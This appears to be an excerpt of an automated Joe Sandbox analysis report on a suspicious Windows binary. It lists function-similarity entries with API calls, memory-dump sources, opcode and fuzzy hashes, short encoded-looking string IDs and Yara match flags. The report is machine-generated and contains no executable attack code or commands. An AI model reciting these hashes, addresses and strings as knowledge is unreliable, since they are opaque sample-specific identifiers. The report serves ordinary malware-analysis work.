                                            Yara matches
                                            Similarity
                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3480331319-1018135373
                                            • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction ID: 2e5bb38c2ab6c062edae79d4077ab7c348a514ec97dfb4f641ac42324fab9e76
                                            • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction Fuzzy Hash: 97418E34B00218ABDF10DF68E884A9EBBB5FF45318F148056EC15AB362D775BA15CBA1
                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C085
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction ID: fbbd96fe11317218043276dd35bf9a0f08be73a273ccdb2477d392fe495d2932
                                            • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction Fuzzy Hash: EC414972900209EFCF15DF94CD81AAEBBB5BF48304F14826AF9057B2A2D3399951DF58
                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                            • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                            • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                            • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                            APIs
                                            • RtlEncodePointer.NTDLL(00000000), ref: 04D1C2EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction ID: 8e16835d7bfb3f1c2e63bd7adeb63dadcbd7cf20a90b367a0a0a759d7f9abe1e
                                            • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction Fuzzy Hash: 46412871A40209FFDF25DF98E980AEEBBB5FF48704F148059FD04A6261D335A950DB61
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 0040138C
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: KN$]DFE
                                            • API String ID: 2296764815-873640922
                                            • Opcode ID: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                            • Instruction ID: c7a597aca517c447b6d362385d7579deaaf1cbe7f5b4030a5a3b5ced69f100f5
                                            • Opcode Fuzzy Hash: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                            • Instruction Fuzzy Hash: 57210CB0F00384CAE724DF64E8467B9B760AF19308F44827AF8546B2B2D77855C2CB5D
                                            APIs
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D115F3
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: KN$]DFE
                                            • API String ID: 4132704954-873640922
                                            • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction ID: 5a595a3bc9408e3b4be581a2d986bcac07745c354329672faf04467a4baf3c8b
                                            • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction Fuzzy Hash: AE2148F0F01284EAE720DF28F8557A8B7B0EF19308F848265E9551B271DB7566C6CB1D
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 0040847E
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: CD^O$_DC[
                                            • API String ID: 2296764815-3597986494
                                            • Opcode ID: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                            • Instruction ID: e43b8a85f3d3021ebc641e50c070c1ece00a7f90a8480fa311e7b242f9d929d7
                                            • Opcode Fuzzy Hash: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                            • Instruction Fuzzy Hash: A0012B70F04258CBC720EBB9AD41A5D7360A718304F50017ED51467381EB789941878D
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407EBE
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: CD^O$_DC[
                                            • API String ID: 2296764815-3597986494
                                            • Opcode ID: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                            • Instruction ID: 75c8c8ce13ad0cb5c53a0921d7a0f1eb8d827427a00a4f276ef8137bbb37e5e9
                                            • Opcode Fuzzy Hash: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                            • Instruction Fuzzy Hash: 5601DB71F05248CFC720EBA4ED4196A7760AB15304F90017EE51967391D6785D41874F
                                            APIs
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D186E5
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 4132704954-3597986494
                                            • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction ID: 5c75b144f3d06f6e04e78f2f1c6efddfb9edd8a136d5b4b745c2fa1b5a1e5a43
                                            • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction Fuzzy Hash: 0B0149B0F44358ABC720FF7CFD91A5D73A0EB18210F9005A9D91057360DB74B585CB99
                                            APIs
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D18125
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 4132704954-3597986494
                                            • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                            • Instruction ID: 4bd38603a4397769e654feb31922a337d91e78b733cd913e7ba32a7839ea3813
                                            • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                            • Instruction Fuzzy Hash: 730126F1F01258ABC720EF68FC51A69B3A0EB05200FA001A9EC195B360D6346585CB56
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407869
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: DCDO$EDO*
                                            • API String ID: 2296764815-3480089779
                                            • Opcode ID: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                            • Instruction ID: 2c0c492e7e72bdb30d52bd5223af33e2dc0730c32d16496d374a94bf7777f62b
                                            • Opcode Fuzzy Hash: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                            • Instruction Fuzzy Hash: 5B016275F08208DBDB20EFA5D842E5DB7B0AB14708F50417ED916A7791DA38AD02CF4D
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407979
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: DCDO$^]E*
                                            • API String ID: 2296764815-2708296792
                                            • Opcode ID: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                            • Instruction ID: a49365da1333b78fae32507e70f919b170a79118b3a39b38b1efb03faeb462bb
                                            • Opcode Fuzzy Hash: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                            • Instruction Fuzzy Hash: 92011DB0F042089BD720EFA9E883A9DB7A0A784704F90417FE919A7391D6396D81CF4D
                                            APIs
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D17AD0
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: DCDO$EDO*
                                            • API String ID: 4132704954-3480089779
                                            • Opcode ID: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                            • Instruction ID: d5494cf928be0d40734a95ec6150a6cd70083cfba943cde96bb13c5beedec1ce
                                            • Opcode Fuzzy Hash: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                            • Instruction Fuzzy Hash: 62016DB4F44208EBDB20DFA4E891E5DB7B0EB14704F9041BADC15973A0DA35AA46CF59
                                            APIs
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D17BE0
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: DCDO$^]E*
                                            • API String ID: 4132704954-2708296792
                                            • Opcode ID: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                            • Instruction ID: 2e30c873e3a7fdf1ded5eebf02bd762e8e97e9341573f318e6475c42667f2513
                                            • Opcode Fuzzy Hash: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                            • Instruction Fuzzy Hash: B4016DF0F41208ABD720DFA8E992A9D77A0E744704F9041BAEC15573A0DA35B985CF59